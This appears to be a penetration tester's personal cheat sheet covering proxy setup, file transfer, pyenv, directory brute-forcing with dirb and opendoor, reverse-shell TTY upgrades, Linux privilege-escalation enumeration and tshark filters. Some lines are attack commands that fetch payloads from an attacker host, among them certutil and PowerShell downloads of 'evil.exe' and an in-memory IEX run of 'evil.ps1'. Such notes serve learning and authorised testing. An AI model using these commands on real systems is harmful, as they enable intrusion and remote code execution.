Set Proxy Settings for Autochrome/Chromium in Kali

When trying to set proxy settings in Autochrome/Chromium in Kali, you might face the message “When running Chrmium under a supported desktop environment, the system proxy settings will be used”

You can set proxy settings in a Chromium config file with the steps below:

• In Kali, cd /usr/share/applications, then ls -la | grep chromium to confirm that chromium.desktop exists

• sudo mousepad chromium.desktop. In mousepad, search for “Exec”

• Add –proxy-server=”http://127.0.0.1:8080″ after %U, then save the file and use Autochrome/Chromium

File Transfer

Transfer files via NC

First, on victim: nc -lvp 9999 > output.exploit

Second, on attacker: nc x.x.x.x 9999 < output.exploit

Transfer files via HTTP (Linux)

First, on attacker: python -m SimpleHTTPServer 9999

Alternatively, on attacker: python3 -m http.server 80

Then, on attacker: wget http://x.x.x.x:9999/filename.txt

Or wget http://x.x.x.x:9999/filename.txt -O filename.txt

Transfer files via certutil (Windows)

certutil.exe -urlcache -f http://attacker_ip/terrible.exe bad.exe

Transfer files via Powershell

powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://attacker_ip/evil.exe&#8217;, ‘evil.exe’)

Execute script directly in memory via Powershell

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString(‘http://attacker_ip/evil.ps1&#8217;)

Transfer files via FTP (to be tested further)

First, on attacker: sudo apt update && sudo apt install pure-ftpd

Then, on victim: ftp attacker_ip

Pyenv on Kali

1. Install Pyenv + Python 2.7.18, run the following commands

sudo apt install -y build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils tk-dev libffi-dev liblzma-dev python3-openssl git

curl https://pyenv.run | zsh

echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc

echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc

echo -e 'if command -v pyenv 1>/dev/null 2>&1; then\n  eval "$(pyenv init -)"\nfi' >> ~/.zshrc

exec $SHELL

pyenv

pyenv install 2.7.18

pyenv versions

2. To change python versions in pyenv

pyenv global 2.7.18

pyenv global system

3. To get pip for Python 2

pyenv global 2.7.18

pyenv shell 2.7.18

cd Desktop

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

sudo python2 get-pip.py

4. To install impacket in Python 2

pyenv global 2.7.18

pyenv shell 2.7.18

sudo pip2 install -U setuptools

sudo python2 -m pip install impacket

Source:
https://www.kali.org/docs/general-use/using-eol-python-versions/

https://stackoverflow.com/questions/65195747/issue-with-impacket-python

Bash Loop Script to Curl URLs for HTTP Response

#!/bin/bash

while read line;

do

output=$(curl -s -o /dev/null -w “%{http_code}” $line)

echo $line, $output

done < NAME_OF_FILE

1. The curl command is only for returning HTTP code (e.g. 200, 404)
2. Substitute “NAME_OF_FILE” with the file containing sitemap of URL
3. Filter by ./script.sh | grep “, 200”

Opendoor

opendoor switches:
--host to input URL
-s directories or -s subdomains
-w to select wordlist
-e to search for file types (php, txt, xml)
--prefix to append word/phrase to URL 
--reports html or json or text to output html, json or text

- Green responses are 200, blue responses are 302, brown is 404

- Example commands:
    > opendoor --host http://xxx -s directories -w /usr/share/wordlists/dirb/common.txt -e php,txt,xml --prefix data/ --reports html

Dirb

dirb commands
-r for non recursive mode
-N xxx to ignore specific http response code (e.g. 403, 404)
-X to search for specific extension (e.g. .txt, .php)
-w to suppress warnings
-o to output to a file

- Default wordlists are in /usr/share/wordlists/

- Default one is common.txt

- Example commands:
    - dirb http://xxxx /usr/share/wordlists/dirb/big.txt -r -N 403
    - dirb http://xxxx -r in non-recursive mode
    - dirb http://xxxx -r -N 403

Using VIM

If terminal does not have a default editor or throws errors, type

export EDITOR=vi

If in reverse shell and need to edit using VIM

Press Ctrl Z

stty -a | head -n1 | cut -d ‘;’ -f 2-3 | cut -b2- | sed ‘s/; /\n/’

stty rows x cols x

stty raw -echo; fg

python3 -c ‘import pty;pty.spawn(“/bin/bash”);’

Editing in VIM

Press i to enter INSERT mode to edit text

Press ESC to exit editing text

If not in INSERT mode, type dw at the beginning of a word to remove it

If not in INSERT mode, type :w to save file

If not in INSERT mode, type 😡 to exit

Linux Privilege Escalation

1. Get LinEnum, LinPeas or Linux Exploit Suggester
   • https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
   • https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
   • https://github.com/mzet-/linux-exploit-suggester
2. Transfer them over to the victim via netcat or SimpleHTTPServer and execute
3. Look out for
   • rwxrwxrwx permissions on files in sensitive locations
   • Ability to sudo as root for specific commands
4. Look at GTFOBins
   • https://gtfobins.github.io/

Linux Exploit Tips

Compile exploit to executable

gcc xxx.c -o pwn

Compile exploit to 32 bits executable

gcc -m32 xxx.c -o pwn32

If error messages occur when compiling exploit to 32 bits executable

sudo apt-get update

sudo apt-get install gcc-multilib

Then run gcc -m32 xxx.c -o pwn32 again

To send exploit over (via nc)

First, on victim: nc -lvp 9999 > output.exploit

Second, on attacker: nc x.x.x.x 9999 < output.exploit

To send exploit over (via HTTP)

First, on attacker: python -m SimpleHTTPServer 9999

Then, on attacker: wget http://x.x.x.x:9999/filename.txt

Or wget http://x.x.x.x:9999/filename.txt -O filename.txt

To run exploit

chmod 775 filename

Try chmod +x also if needed

tshark

Tshark usage sample below

Get stats on HTTP

tshark -r xxx.pcap -n -q -z http,tree

Get stream numbers with HTTP in it

tshark -r xxx.pcap -n -Y ‘tcp.port == 80 and http.request.method == GET’ -T fields -e tcp.stream | sort -n | uniq

Search for URL

tshark -n -r xxx.pcap -Y ‘tcp contains test.com’

Filter by IP address and Port, then get Stream numbers

tshark -n -r xxx.pcap -Y ‘ip.addr == xx and tcp.port == xx’ -T fields -e tcp.stream | uniq

Follow a stream

tshark -n -r xxx.pcap -z follow,tcp,ascii,yyy

where yyy is the stream number

Get source IP of packets where ECN flag is set to 1

tshark -n -r xxx.pcap -Y ‘tcp.flags.ecn == 1’ -T fields -e ip.src | sort -n | uniq

Get source IP of packets with listening ports (based on SYN ACK response)

tshark -n -r xxx.pcap -Y ‘tcp.flags.syn == 1 && tcp.flags.ack == 1’ -T fields -e ip.src | sort | uniq

Get strange DNS packets with query and response in it

tshark -n -r xxx.pcap -Y ‘(udp.dstport == 53 and dns.flags.response == 0 and dns.count.queries > 0 and dns.count.answers > 0)’ -T fields -e dns.a

Need to loop through multiple packets?

#!/bin/bash

for file in “/folder/with/pcaps”*;
do
tshark -n -r $file xxxxxx
done

where xxxxxx is all your filters like -Y ‘ip.addr == x.x.x.x’ -T fields -e ip.src | sort | uniq

Save the above into a file

chmod +x it

Then ./filename to run it